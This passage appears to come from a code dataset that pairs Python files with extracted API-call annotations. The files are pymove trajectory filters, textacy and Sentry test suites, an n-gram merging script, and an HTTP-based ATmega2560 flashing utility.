        label_new_tid=label_tid,
        inplace=True
    )
    logger.debug('Updating dist time speed values')
    move_data.generate_dist_time_speed_features(label_id=label_tid)
    move_data[new_label] = False
    # Flag every point of a segment whose accumulated stop time reaches the limit.
    df_agg_tid = move_data.groupby(by=label_tid).agg({TIME_TO_PREV: 'sum'})
    filter_ = df_agg_tid[TIME_TO_PREV] >= max_time_stop
    idx = df_agg_tid[filter_].index
    move_data.loc[move_data[label_tid].isin(idx), new_label] = True
    return _end_create_operation(
        move_data, new_label, inplace
    )
@timer_decorator
def filter_block_signal_by_repeated_amount_of_points(
    move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
    amount_max_of_points_stop: float = 30.0,
    max_time_stop: float = 7200,
    filter_out: bool = False,
    label_tid: str = TID_PART,
    inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
    """
    Filters from dataframe points with blocked signal by amount of points.
    Parameters
    ----------
    move_data: dataFrame
        The input trajectories data.
    amount_max_of_points_stop: float, optional
        Maximum number of stopped points, by default 30
    max_time_stop: float, optional
        Maximum time allowed with speed 0, by default 7200
    filter_out: boolean, optional
        If set to True, it will return trajectory points with blocked signal,
        by default False
    label_tid : str, optional
        The label of the column containing the ids of the formed segments,
        by default TID_PART
    inplace : boolean, optional
        if set to true the original dataframe will be altered to contain
        the result of the filtering, otherwise a copy will be returned,
        by default False
    Returns
    -------
    DataFrame
        Filtered DataFrame with the additional features or None
        'dist_to_prev', 'time_to_prev', 'speed_to_prev',
        'tid_dist', 'block_signal'
    """
    if not inplace:
        move_data = move_data.copy()
    # Make sure the BLOCK feature exists before aggregating over it.
    if BLOCK not in move_data:
        create_or_update_gps_block_signal(
            move_data, max_time_stop, label_tid=label_tid, inplace=True
        )
    # Per-segment sum of the boolean BLOCK column == number of blocked points.
    df_count_tid = move_data.groupby(by=[label_tid]).sum()
    filter_ = df_count_tid[BLOCK] > amount_max_of_points_stop
    # filter_out=True drops the NON-blocked segments, keeping only the blocked
    # ones; filter_out=False drops the blocked segments.
    if filter_out:
        idx = df_count_tid[~filter_].index
    else:
        idx = df_count_tid[filter_].index
    filter_ = move_data[move_data[label_tid].isin(idx)].index
    move_data.drop(index=filter_, inplace=True)
    if not inplace:
        return move_data
@timer_decorator
def filter_block_signal_by_time(
    move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
    max_time_stop: float = 7200,
    filter_out: bool = False,
    label_tid: str = TID_PART,
    inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
    """
    Filters from dataframe points with blocked signal by time.
    Parameters
    ----------
    move_data: dataFrame
        The input trajectories data.
    max_time_stop: float, optional
        Maximum time allowed with speed 0, by default 7200
    filter_out: boolean, optional
        If set to True, it will return trajectory points with blocked signal,
        by default False
    label_tid : str, optional
        The label of the column containing the ids of the formed segments,
        by default TID_PART
    inplace : boolean, optional
        if set to true the original dataframe will be altered to contain
        the result of the filtering, otherwise a copy will be returned,
        by default False
    Returns
    -------
    DataFrame
        Filtered DataFrame with the additional features or None
        'dist_to_prev', 'time_to_prev', 'speed_to_prev',
        'tid_dist', 'block_signal'
    """
    if not inplace:
        move_data = move_data.copy()
    # Make sure the BLOCK feature exists before aggregating over it.
    if BLOCK not in move_data:
        create_or_update_gps_block_signal(
            move_data, max_time_stop, label_tid=label_tid, inplace=True
        )
    # Per-segment totals: accumulated time and number of blocked points.
    df_agg_tid = move_data.groupby(by=label_tid).agg(
        {TIME_TO_PREV: 'sum', BLOCK: 'sum'}
    )
    # A segment counts as blocked when it both exceeds max_time_stop and
    # contains at least one blocked point.
    filter_ = (df_agg_tid[TIME_TO_PREV] > max_time_stop) & (df_agg_tid[BLOCK] > 0)
    # filter_out=True drops the NON-blocked segments, keeping only the blocked
    # ones; filter_out=False drops the blocked segments.
    if filter_out:
        idx = df_agg_tid[~filter_].index
    else:
        idx = df_agg_tid[filter_].index
    filter_ = move_data[move_data[label_tid].isin(idx)].index
    move_data.drop(index=filter_, inplace=True)
    if not inplace:
        return move_data
@timer_decorator
def filter_longer_time_to_stop_segment_by_id(
    move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
    dist_radius: float = 30,
    time_radius: float = 900,
    label_id: str = TRAJ_ID,
    label_segment_stop: str = SEGMENT_STOP,
    filter_out: bool = False,
    inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
    """
    Filters from dataframe segment with longest stop time.
    Parameters
    ----------
    move_data: dataFrame
        The input trajectories data.
    dist_radius : float, optional
        The dist_radius defines the distance used in the segmentation, by default 30
    time_radius : float, optional
        The time_radius used to determine if a segment is a stop, by default 900
        If the user stayed in the segment for a time
        greater than time_radius, than the segment is a stop.
    label_id : str, optional
        The label of the column containing the trajectory ids,
        by default TRAJ_ID
    label_segment_stop: str, optional
        by default 'segment_stop'
    filter_out: boolean, optional
        If set to True, it will return trajectory points with longer time, by default False
    inplace : boolean, optional
        if set to true the original dataframe will be altered to contain
        the result of the filtering, otherwise a copy will be returned,
        by default False
    Returns
    -------
    DataFrame
        Filtered DataFrame with the additional features or None
        'dist_to_prev', 'time_to_prev', 'speed_to_prev',
        'tid_dist', 'block_signal'
    """
    if not inplace:
        move_data = move_data.copy()
    # Make sure stop segments have been detected before aggregating.
    if label_segment_stop not in move_data:
        stay_point_detection.create_or_update_move_stop_by_dist_time(
            move_data, dist_radius, time_radius, inplace=True
        )
    # Total stop time per (trajectory id, stop segment) pair.
    df_agg_id_stop = move_data.groupby(
        [label_id, label_segment_stop], as_index=False
    ).agg({TIME_TO_PREV: 'sum'})
    # Index of the longest-stop segment of each trajectory.
    filter_ = df_agg_id_stop.groupby(
        [label_id], as_index=False
    ).idxmax()[TIME_TO_PREV]
    # filter_out=True drops everything EXCEPT the longest stops; otherwise the
    # longest stops themselves are dropped.
    if filter_out:
        segments = df_agg_id_stop.loc[~df_agg_id_stop.index.isin(filter_)]
    else:
        segments = df_agg_id_stop.loc[df_agg_id_stop.index.isin(filter_)]
    segments = segments[label_segment_stop]
    filter_ = move_data[move_data[label_segment_stop].isin(segments)].index
    move_data.drop(index=filter_, inplace=True)
    if not inplace:
        return move_data
| [
"pymove.preprocessing.filters.by_bbox",
"pymove.preprocessing.stay_point_detection.create_or_update_move_stop_by_dist_time",
"pymove.utils.log.logger.debug",
"pymove.utils.log.logger.warning",
"pymove.preprocessing.segmentation.by_max_dist",
"numpy.concatenate",
"pymove.preprocessing.segmentation.by_dis... | [((2615, 2659), 'numpy.concatenate', 'np.concatenate', (['[idx_start, idx_end]'], {'axis': '(0)'}), '([idx_start, idx_end], axis=0)\n', (2629, 2659), True, 'import numpy as np\n'), ((5895, 5986), 'pymove.utils.log.logger.debug', 'logger.debug', (['"""\nCreate or update boolean feature to detect points out of the bbox"""'], {}), '(\n """\nCreate or update boolean feature to detect points out of the bbox""")\n', (5907, 5986), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((5995, 6044), 'pymove.preprocessing.filters.by_bbox', 'filters.by_bbox', (['move_data', 'bbox'], {'filter_out': '(True)'}), '(move_data, bbox, filter_out=True)\n', (6010, 6044), False, 'from pymove.preprocessing import filters, segmentation, stay_point_detection\n'), ((6125, 6188), 'pymove.utils.log.logger.debug', 'logger.debug', (["('...Creating a new label named as %s' % new_label)"], {}), "('...Creating a new label named as %s' % new_label)\n", (6137, 6188), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((7765, 7816), 'pymove.utils.log.logger.debug', 'logger.debug', (['(message % max_time_between_adj_points)'], {}), '(message % max_time_between_adj_points)\n', (7777, 7816), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((9302, 9353), 'pymove.utils.log.logger.debug', 'logger.debug', (['(message % max_dist_between_adj_points)'], {}), '(message % max_dist_between_adj_points)\n', (9314, 9353), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((11410, 11469), 'pymove.utils.log.logger.debug', 'logger.debug', (['"""\nCreate or update short trajectories..."""'], {}), '("""\nCreate or update short trajectories...""")\n', (11422, 11469), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((11472, 11741), 'pymove.preprocessing.segmentation.by_dist_time_speed', 'segmentation.by_dist_time_speed', (['move_data'], {'max_dist_between_adj_points': 
'max_dist_between_adj_points', 'max_time_between_adj_points': 'max_time_between_adj_points', 'max_speed_between_adj_points': 'max_speed_between_adj_points', 'label_new_tid': 'label_tid', 'inplace': '(True)'}), '(move_data, max_dist_between_adj_points=\n max_dist_between_adj_points, max_time_between_adj_points=\n max_time_between_adj_points, max_speed_between_adj_points=\n max_speed_between_adj_points, label_new_tid=label_tid, inplace=True)\n', (11503, 11741), False, 'from pymove.preprocessing import filters, segmentation, stay_point_detection\n'), ((13487, 13524), 'pymove.utils.log.logger.debug', 'logger.debug', (['(message % max_time_stop)'], {}), '(message % max_time_stop)\n', (13499, 13524), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((13529, 13640), 'pymove.preprocessing.segmentation.by_max_dist', 'segmentation.by_max_dist', (['move_data'], {'max_dist_between_adj_points': '(0.0)', 'label_new_tid': 'label_tid', 'inplace': '(True)'}), '(move_data, max_dist_between_adj_points=0.0,\n label_new_tid=label_tid, inplace=True)\n', (13553, 13640), False, 'from pymove.preprocessing import filters, segmentation, stay_point_detection\n'), ((13680, 13727), 'pymove.utils.log.logger.debug', 'logger.debug', (['"""Updating dist time speed values"""'], {}), "('Updating dist time speed values')\n", (13692, 13727), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((4040, 4086), 'pymove.utils.log.logger.debug', 'logger.debug', (['"""...Reset index for filtering\n"""'], {}), "('...Reset index for filtering\\n')\n", (4052, 4086), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((4653, 4709), 'pymove.utils.log.logger.warning', 'logger.warning', (['"""...Distances features were not created"""'], {}), "('...Distances features were not created')\n", (4667, 4709), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((6262, 6312), 'pymove.utils.log.logger.debug', 'logger.debug', (["('...Setting % as True\\n' % 
new_label)"], {}), "('...Setting % as True\\n' % new_label)\n", (6274, 6312), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((19774, 19889), 'pymove.preprocessing.stay_point_detection.create_or_update_move_stop_by_dist_time', 'stay_point_detection.create_or_update_move_stop_by_dist_time', (['move_data', 'dist_radius', 'time_radius'], {'inplace': '(True)'}), '(move_data,\n dist_radius, time_radius, inplace=True)\n', (19834, 19889), False, 'from pymove.preprocessing import filters, segmentation, stay_point_detection\n')] |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import pytest
from textacy import Corpus
from textacy import Doc
from textacy import cache
from textacy import compat
from textacy import io
from textacy.datasets.capitol_words import CapitolWords
# Shared dataset instance; `filename` is None until the data is downloaded.
DATASET = CapitolWords()
# Skip every test in this module when the dataset is not available locally.
pytestmark = pytest.mark.skipif(
    DATASET.filename is None,
    reason='CapitolWords dataset must be downloaded before running tests')
@pytest.fixture(scope='module')
def corpus(request):
    # Build a small 3-record corpus once per module; tests only read from it.
    texts, metadatas = io.split_records(
        DATASET.records(limit=3), 'text')
    corpus = Corpus('en', texts=texts, metadatas=metadatas)
    return corpus
# init tests
def test_corpus_init_lang():
    """A language code or a loaded spacy pipeline is accepted; other types raise."""
    assert isinstance(Corpus('en'), Corpus)
    assert isinstance(Corpus(cache.load_spacy('en')), Corpus)
    bad_langs = (b'en', None)
    for lang in bad_langs:
        with pytest.raises(TypeError):
            Corpus(lang)
def test_corpus_init_texts():
    """Corpus built from raw texts gets one doc per text, all sharing one vocab."""
    n_texts = 3
    corpus = Corpus('en', texts=DATASET.texts(limit=n_texts))
    assert len(corpus.docs) == n_texts
    for doc in corpus:
        assert doc.spacy_vocab is corpus.spacy_vocab
def test_corpus_init_texts_and_metadatas():
    """Texts and their metadata stay aligned after corpus construction."""
    n_records = 3
    texts, metadatas = io.split_records(
        DATASET.records(limit=n_records), 'text')
    texts, metadatas = list(texts), list(metadatas)
    corpus = Corpus('en', texts=texts, metadatas=metadatas)
    assert len(corpus.docs) == n_records
    for doc in corpus:
        assert doc.spacy_vocab is corpus.spacy_vocab
    for doc, text, metadata in zip(corpus, texts, metadatas):
        assert doc.text == text
        assert doc.metadata == metadata
def test_corpus_init_docs():
    # Pre-built textacy Docs can seed a Corpus directly.
    limit = 3
    texts, metadatas = io.split_records(
        DATASET.records(limit=limit), 'text')
    docs = [Doc(text, lang='en', metadata=metadata)
            for text, metadata in zip(texts, metadatas)]
    corpus = Corpus('en', docs=docs)
    assert len(corpus.docs) == limit
    assert all(doc.spacy_vocab is corpus.spacy_vocab for doc in corpus)
    for i in range(limit):
        assert corpus[i].metadata == docs[i].metadata
    # An explicit `metadatas` argument overrides the metadata on the docs.
    corpus = Corpus(
        'en', docs=docs, metadatas=({'foo': 'bar'} for _ in range(limit)))
    for i in range(limit):
        assert corpus[i].metadata == {'foo': 'bar'}
def test_corpus_init_no_parser():
    """Without a parser, sentence counts are unavailable but docs still load."""
    spacy_lang = cache.load_spacy('en', disable=('parser',))
    doc = spacy_lang('This is a sentence in a doc.')
    corpus = Corpus(spacy_lang, docs=(doc,))
    assert corpus.n_sents is None
    assert len(corpus) == 1
# methods tests
def test_corpus_save_and_load(tmpdir, corpus):
    # Round-trip the module-level corpus through a pickle file on disk.
    filepath = str(tmpdir.join('test_corpus_save_and_load.pkl'))
    corpus.save(filepath)
    new_corpus = Corpus.load(filepath)
    assert isinstance(new_corpus, Corpus)
    assert len(new_corpus) == len(corpus)
    assert new_corpus.lang == corpus.lang
    assert new_corpus.spacy_lang.pipe_names == corpus.spacy_lang.pipe_names
    # Loading must not leave transient per-doc language metadata behind.
    assert new_corpus[0].spacy_doc.user_data['textacy'].get('spacy_lang_meta') is None
    for i in range(len(new_corpus)):
        assert new_corpus[i].metadata == corpus[i].metadata
| [
"textacy.Corpus",
"textacy.cache.load_spacy",
"textacy.Doc",
"textacy.Corpus.load",
"pytest.raises",
"pytest.mark.skipif",
"pytest.fixture",
"textacy.datasets.capitol_words.CapitolWords"
] | [((291, 305), 'textacy.datasets.capitol_words.CapitolWords', 'CapitolWords', ([], {}), '()\n', (303, 305), False, 'from textacy.datasets.capitol_words import CapitolWords\n'), ((320, 440), 'pytest.mark.skipif', 'pytest.mark.skipif', (['(DATASET.filename is None)'], {'reason': '"""CapitolWords dataset must be downloaded before running tests"""'}), "(DATASET.filename is None, reason=\n 'CapitolWords dataset must be downloaded before running tests')\n", (338, 440), False, 'import pytest\n'), ((448, 478), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (462, 478), False, 'import pytest\n'), ((596, 642), 'textacy.Corpus', 'Corpus', (['"""en"""'], {'texts': 'texts', 'metadatas': 'metadatas'}), "('en', texts=texts, metadatas=metadatas)\n", (602, 642), False, 'from textacy import Corpus\n'), ((1346, 1392), 'textacy.Corpus', 'Corpus', (['"""en"""'], {'texts': 'texts', 'metadatas': 'metadatas'}), "('en', texts=texts, metadatas=metadatas)\n", (1352, 1392), False, 'from textacy import Corpus\n'), ((1875, 1898), 'textacy.Corpus', 'Corpus', (['"""en"""'], {'docs': 'docs'}), "('en', docs=docs)\n", (1881, 1898), False, 'from textacy import Corpus\n'), ((2317, 2360), 'textacy.cache.load_spacy', 'cache.load_spacy', (['"""en"""'], {'disable': "('parser',)"}), "('en', disable=('parser',))\n", (2333, 2360), False, 'from textacy import cache\n'), ((2691, 2712), 'textacy.Corpus.load', 'Corpus.load', (['filepath'], {}), '(filepath)\n', (2702, 2712), False, 'from textacy import Corpus\n'), ((728, 740), 'textacy.Corpus', 'Corpus', (['"""en"""'], {}), "('en')\n", (734, 740), False, 'from textacy import Corpus\n'), ((1765, 1804), 'textacy.Doc', 'Doc', (['text'], {'lang': '"""en"""', 'metadata': 'metadata'}), "(text, lang='en', metadata=metadata)\n", (1768, 1804), False, 'from textacy import Doc\n'), ((779, 801), 'textacy.cache.load_spacy', 'cache.load_spacy', (['"""en"""'], {}), "('en')\n", (795, 801), False, 'from textacy import cache\n'), 
((860, 884), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (873, 884), False, 'import pytest\n'), ((898, 914), 'textacy.Corpus', 'Corpus', (['bad_lang'], {}), '(bad_lang)\n', (904, 914), False, 'from textacy import Corpus\n')] |
from django.core.urlresolvers import reverse
from mock import patch
from sentry.constants import MEMBER_ADMIN
from sentry.models import Team, TeamStatus
from sentry.testutils import APITestCase
class TeamDetailsTest(APITestCase):
    def test_simple(self):
        """GET on the team-details endpoint returns the serialized team."""
        team = self.team  # force creation
        self.login_as(user=self.user)
        path = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
        response = self.client.get(path)
        assert response.status_code == 200
        assert response.data['id'] == str(team.id)
class TeamUpdateTest(APITestCase):
    def test_simple(self):
        """PUT with a valid name/slug persists both fields on the team."""
        team = self.team  # force creation
        self.login_as(user=self.user)
        url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
        resp = self.client.put(url, data={
            'name': '<NAME>',
            'slug': 'foobar',
        })
        assert resp.status_code == 200, resp.content
        # Re-fetch from the database to confirm the update was persisted.
        team = Team.objects.get(id=team.id)
        assert team.name == '<NAME>'
        assert team.slug == 'foobar'

    def test_invalid_slug(self):
        """Reserved slugs such as 'admin' are rejected with a 400."""
        team = self.team  # force creation
        self.login_as(user=self.user)
        url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
        resp = self.client.put(url, data={
            'name': '<NAME>',
            'slug': 'admin',
        })
        assert resp.status_code == 400, resp.content

    def test_owner_can_change_owner(self):
        """The current owner may transfer ownership; both users stay admins."""
        user = self.create_user('<EMAIL>', is_superuser=False)
        new_user = self.create_user('<EMAIL>')
        team = self.create_team(owner=user)
        url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
        self.login_as(user=user)
        resp = self.client.put(url, {
            'name': 'Test Team',
            'slug': 'test',
            'owner': new_user.username,
        })
        assert resp.status_code == 200, resp.content
        team = Team.objects.get(name='Test Team')
        assert team.owner == new_user
        # Both the old and the new owner remain members with admin rights.
        member_set = list(team.member_set.all())
        self.assertEquals(len(member_set), 2)
        member_set.sort(key=lambda x: x.user_id)
        member = member_set[0]
        self.assertEquals(member.user, user)
        self.assertEquals(member.type, MEMBER_ADMIN)
        member = member_set[1]
        self.assertEquals(member.user, new_user)
        self.assertEquals(member.type, MEMBER_ADMIN)
class TeamDeleteTest(APITestCase):
    @patch('sentry.api.endpoints.team_details.delete_team')
    def test_simple(self, delete_team):
        """DELETE marks the team pending deletion and schedules the async task."""
        team = self.create_team()
        project = self.create_project(team=team)  # NOQA
        self.login_as(user=self.user)
        url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
        with self.settings(SENTRY_PROJECT=0):
            response = self.client.delete(url)
        team = Team.objects.get(id=team.id)
        # Deletion is asynchronous: the row is only flagged, not removed.
        assert team.status == TeamStatus.PENDING_DELETION
        assert response.status_code == 204
        delete_team.delay.assert_called_once_with(
            object_id=team.id,
            countdown=60 * 5,
        )

    def test_internal_project(self):
        """The team owning the internal SENTRY_PROJECT cannot be deleted."""
        team = self.create_team()
        project = self.create_project(team=team)
        self.login_as(user=self.user)
        url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
        with self.settings(SENTRY_PROJECT=project.id):
            response = self.client.delete(url)
        assert response.status_code == 403

    def test_as_non_owner(self):
        """A plain admin member who is not the owner cannot delete the team."""
        team = self.create_team(owner=self.user)
        project = self.create_project(team=team)  # NOQA
        user = self.create_user(email='<EMAIL>', is_superuser=False)
        team.member_set.create(user=user, type=MEMBER_ADMIN)
        self.login_as(user=user)
        url = reverse('sentry-api-0-team-details', kwargs={'team_id': team.id})
        response = self.client.delete(url)
        assert response.status_code == 403
| [
"sentry.models.Team.objects.get",
"mock.patch",
"django.core.urlresolvers.reverse"
] | [((2482, 2536), 'mock.patch', 'patch', (['"""sentry.api.endpoints.team_details.delete_team"""'], {}), "('sentry.api.endpoints.team_details.delete_team')\n", (2487, 2536), False, 'from mock import patch\n'), ((355, 420), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (362, 420), False, 'from django.core.urlresolvers import reverse\n'), ((714, 779), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (721, 779), False, 'from django.core.urlresolvers import reverse\n'), ((962, 990), 'sentry.models.Team.objects.get', 'Team.objects.get', ([], {'id': 'team.id'}), '(id=team.id)\n', (978, 990), False, 'from sentry.models import Team, TeamStatus\n'), ((1194, 1259), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (1201, 1259), False, 'from django.core.urlresolvers import reverse\n'), ((1639, 1704), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (1646, 1704), False, 'from django.core.urlresolvers import reverse\n'), ((1959, 1993), 'sentry.models.Team.objects.get', 'Team.objects.get', ([], {'name': '"""Test Team"""'}), "(name='Test Team')\n", (1975, 1993), False, 'from sentry.models import Team, TeamStatus\n'), ((2722, 2787), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (2729, 2787), False, 'from django.core.urlresolvers import reverse\n'), ((2898, 2926), 'sentry.models.Team.objects.get', 
'Team.objects.get', ([], {'id': 'team.id'}), '(id=team.id)\n', (2914, 2926), False, 'from sentry.models import Team, TeamStatus\n'), ((3327, 3392), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (3334, 3392), False, 'from django.core.urlresolvers import reverse\n'), ((3861, 3926), 'django.core.urlresolvers.reverse', 'reverse', (['"""sentry-api-0-team-details"""'], {'kwargs': "{'team_id': team.id}"}), "('sentry-api-0-team-details', kwargs={'team_id': team.id})\n", (3868, 3926), False, 'from django.core.urlresolvers import reverse\n')] |
import gzip
import glob
import argparse
import sys
def merge():
    """Concatenate every pubmed*.txt.gz in the working directory into ngram.merged.txt.gz."""
    with gzip.open("ngram.merged.txt.gz", 'w') as out:
        for path in glob.glob("pubmed*.txt.gz"):
            print("processing: {}".format(path))
            with gzip.open(path, 'rb') as src:
                for line in src:
                    out.write(line)
def sort_merged_file():
    # Placeholder: the sorting logic currently lives in the __main__ block below.
    pass
if __name__ == '__main__':
    print('Number of arguments:', len(sys.argv), 'arguments.')
    print('Argument List:', str(sys.argv))
    lista = []
    # Read "<ngram>\t<count>" records from the merged archive into memory.
    with gzip.open("ngram.merged_sorted.gz", 'rb') as file_open_handler:
        for line in file_open_handler:
            line_split = line.decode("utf-8").strip().split("\t")
            lista.append([line_split[0], int(line_split[1])])
    # Sort by descending frequency.
    lista = sorted(lista, key=lambda line_split: line_split[1], reverse=True)
    # Split the output: single-word ngrams go to *_sorted1, multi-word
    # ngrams to *_sorted2.
    with gzip.open("ngram.merged_sorted1.txt.gz", 'w') as file_write_handler:
        with gzip.open("ngram.merged_sorted2.txt.gz", 'w') as file_write2_handler:
            for line_split in lista:
                temp_str = "\t".join(str(x) for x in line_split)
                if len(line_split[0].split(" ")) == 1:
                    file_write_handler.write("{}\n".format(temp_str).encode("utf-8"))
                else:
                    file_write2_handler.write("{}\n".format(temp_str).encode("utf-8"))
    print("*-*-*")
    # parser = argparse.ArgumentParser(description='utils')
    # parser.add_argument('integers', metavar='N', type=int, nargs='+',
    #                     help='an integer for the accumulator')
    # parser.add_argument('--sum', dest='accumulate', action='store_const',
    #                     const=sum, default=max,
    #                     help='sum the integers (default: find the max)')
    #
    # args = parser.parse_args()
    # # print(args.accumulate(args.integers))
| [
"glob.glob",
"gzip.open"
] | [((75, 112), 'gzip.open', 'gzip.open', (['"""ngram.merged.txt.gz"""', '"""w"""'], {}), "('ngram.merged.txt.gz', 'w')\n", (84, 112), False, 'import gzip\n'), ((153, 180), 'glob.glob', 'glob.glob', (['"""pubmed*.txt.gz"""'], {}), "('pubmed*.txt.gz')\n", (162, 180), False, 'import glob\n'), ((636, 677), 'gzip.open', 'gzip.open', (['"""ngram.merged_sorted.gz"""', '"""rb"""'], {}), "('ngram.merged_sorted.gz', 'rb')\n", (645, 677), False, 'import gzip\n'), ((959, 1004), 'gzip.open', 'gzip.open', (['"""ngram.merged_sorted1.txt.gz"""', '"""w"""'], {}), "('ngram.merged_sorted1.txt.gz', 'w')\n", (968, 1004), False, 'import gzip\n'), ((1041, 1086), 'gzip.open', 'gzip.open', (['"""ngram.merged_sorted2.txt.gz"""', '"""w"""'], {}), "('ngram.merged_sorted2.txt.gz', 'w')\n", (1050, 1086), False, 'import gzip\n'), ((290, 319), 'gzip.open', 'gzip.open', (['current_file', '"""rb"""'], {}), "(current_file, 'rb')\n", (299, 319), False, 'import gzip\n')] |
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# <NAME> wrote this file. As long as you retain
# this notice you can do whatever you want with this stuff. If we meet some day,
# and you think this stuff is worth it, you can buy me a beer in return.
# ----------------------------------------------------------------------------
import sys
import re
import requests
import platform # For getting the operating system name
import subprocess # For executing a shell command
import os
import time
# Anchored IPv4 dotted-quad pattern: four octets, each 0-255, separated by dots.
# Raw string avoids the invalid "\." escape sequence in a non-raw literal
# (a DeprecationWarning in Python 3, and fragile if the escape ever gains meaning).
ip_regex = r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$"
def main(argv):
    """Flash a hex file to an ATmega2560 through an HTTP bridge.

    Parses ``-H/--hostname`` and ``-f/--file`` options, syncs with the AVR
    bootloader, uploads the hex file, and resets the target.

    :param argv: command line arguments (without the program name).
    """
    print("--- flash2560 - Created by <NAME> ---")
    hostname = "192.168.4.1"
    input_file = "none"
    # Handle the command line arguments
    for index, arg in enumerate(argv):
        if arg == "-h" or arg == "--help":
            print_help()
            sys.exit(0)
        elif arg == "-H" or arg == "--hostname":
            if index + 1 < len(argv) and re.search(ip_regex, argv[index + 1]):
                hostname = argv[index + 1]
                if not ping(hostname):
                    print("IP is not reachable:")
                    sys.exit(2)
            else:
                print("IP address is not right")
                print_help()
                sys.exit(1)
        elif arg == "-f" or arg == "--file":
            if index + 1 < len(argv) and os.path.isfile(argv[index + 1]):
                input_file = argv[index + 1]
            else:
                print("Can't open file")
                print_help()
                sys.exit(3)
    if input_file == "none":
        print("No input file")
        print_help()
        sys.exit(4)

    # ------------ GET AVR in SYNC ----------------------------------------
    response = requests.post('http://' + hostname + '/pgmmega/sync')
    if response.status_code != 204:
        # BUG FIX: status_code is an int; concatenating it to a str raised a
        # TypeError instead of printing the intended diagnostic.
        print("Failed to reset the AVR (HTML ERROR: " + str(response.status_code) + ")")
        sys.exit(5)
    while True:
        response = requests.get('http://' + hostname + '/pgmmega/sync')
        if "SYNC" in response.content.decode('ASCII'):
            print(response.content)
            break
        elif "NOT READY" not in response.content.decode('ASCII'):
            print("Could not get in Sync with AVR")
            sys.exit(7)
        time.sleep(0.1)  # poll until the bootloader reports SYNC

    # -------------- Upload HEX file -----------------------------------------
    # Context manager guarantees the hex file handle is closed (the original
    # open(...).read() leaked the handle).
    with open(input_file) as hex_handle:
        hex_file = hex_handle.read()
    response = requests.post('http://' + hostname + '/pgmmega/upload', data=hex_file, timeout=20.0)
    if "Success" in response.content.decode('ASCII'):
        print("+++++ Success :) ++++++")
    else:
        print("Failed :(")
        sys.exit(8)
    # Reset the avr to solve a bug in the bootloader that the program does not start immediately
    time.sleep(0.1)
    requests.post('http://' + hostname + '/console/reset')
    sys.exit(0)
def print_help():
    """Print a short usage summary for the flashing tool."""
    usage_lines = (
        '\n',
        "Usage: ",
        "flash2560.py -H <hostname> -f <hex_file>",
        "\nExample:",
        "flash2560.py -H 192.168.4.1 -f Sketch.hex",
    )
    for line in usage_lines:
        print(line)
def ping(host):
    """Return True if *host* answers a single ICMP echo request.

    :param host: hostname or IP address to probe.
    :return: True when the ping command exits with status 0.
    """
    # Windows ping counts packets with -n; every other OS uses -c.
    param = '-n' if platform.system().lower() == 'windows' else '-c'
    command = ['ping', param, '1', host]
    # BUG FIX: the original opened os.devnull without ever closing it,
    # leaking one file descriptor per call; DEVNULL needs no cleanup.
    return subprocess.call(command, stdout=subprocess.DEVNULL) == 0
if __name__ == "__main__":
    # Drop the script name; main() only expects the option arguments.
    main(sys.argv[1:])
| [
"requests.post",
"requests.get",
"time.sleep",
"os.path.isfile",
"platform.system",
"subprocess.call",
"sys.exit",
"re.search"
